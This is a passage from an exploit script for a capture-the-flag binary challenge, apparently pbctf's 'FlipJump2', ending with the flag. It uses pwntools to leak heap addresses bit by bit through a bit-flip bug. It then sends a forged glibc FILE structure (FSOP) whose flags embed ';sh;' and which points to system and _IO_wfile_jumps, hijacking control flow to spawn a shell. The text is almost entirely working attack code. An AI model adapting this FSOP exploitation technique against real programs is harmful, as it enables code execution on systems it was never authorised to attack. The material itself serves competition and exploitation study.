if int(p.recvuntil(b"]")[:-1].decode()) != (0xee0 + i//8):
print("Falied, retry it")
p.sendlineafter("(Y/N)", "Y")
p.recvuntil(b"Bit ")
if int(p.recv(1)[0] - ord('0')) != (i%8):
print("Falied, retry it")
p.sendlineafter("(Y/N)", "Y")
heap_leak += (int(p.recvline().split(b"->")[0][-1] - ord('0')) << i)
p.sendlineafter("(Y/N)", "Y")
i += 1
# base_ptr = heap_base + 0x1c40
# target_ptr = libc_base + libc.symbols['_IO_2_1_stdin_']
# current_ptr = heap_base + 0x17f0
# current_value = ((base_ptr >> 12) ^ current_ptr)
# target_value = ((base_ptr >> 12) ^ target_ptr)
# i = 0
# while i < 6*8:
# if (target_value >> i) & 1 == (current_value >> i) & 1:
# i += 1
# continue
# p.sendafter(":\n", p64(0x500))
# p.sendafter(":\n", byte_generator( ((0xee0 + 0xaa0 + i//8) * 8) + (i%8) , 0x500))
# p.sendafter(":\n", p64(0x500))
# p.sendafter(":\n", bypass_generator(0x500))
# p.recvuntil(b"Flip[")
# if int(p.recvuntil(b"]")[:-1].decode()) != (0xee0 + 0xaa0+ i//8):
# print("Falied, retry it")
# p.sendlineafter("(Y/N)", "Y")
# continue
# p.recvuntil(b"Bit ")
# if int(p.recv(1)[0] - ord('0')) != (i%8):
# print("Falied, retry it")
# p.sendlineafter("(Y/N)", "Y")
# continue
# heap_leak += (int(p.recvline().split(b"->")[0][-1] - ord('0')) << i)
# p.sendlineafter("(Y/N)", "Y")
# i += 1
# print(hex(heap_leak))
p.sendafter(":\n", p64(0x240))
p.sendafter(":\n", p64(0x100000) + p64(0x0) + p64(libc_base+libc.symbols['system']) + p64(libc_base+0x273888) + p64(0x0) + p64(libc_base+0x273890) + \
p64(0x0) + p64(libc_base + 0x2732e0) + p64(0x0) + p64(libc_base+0x273870) * (0x240//0x8 - 9))
FSOP = FSOP_struct(flags = u64(b"\x01\x01\x01\x01;sh;"), \
_IO_write_ptr = 0x10, \
lock = heap_base + 0x9000 + 0x100, \
_wide_data = libc_base + libc.symbols['_IO_2_1_stdin_'], \
_offset = heap_base + 0x9000, \
_IO_buf_base = 0x1, \
_chain = 0x0, \
_markers = libc_base + libc.symbols['system'], \
_mode = 0xffffffff, \
vtable = libc_base + libc.symbols['_IO_wfile_jumps'], \
more_append = p64(libc_base + libc.symbols['_IO_2_1_stdin_'] - 0x8)
p.sendafter(":\n", p64(0x240))
p.sendafter(":\n", p64(0x100000) + p64(0x0) + FSOP + b"\x00" *(0x230 - len(FSOP)))
FlipJump2: pbctf{you_are_a_certified_flip_jumper_de_gozaru}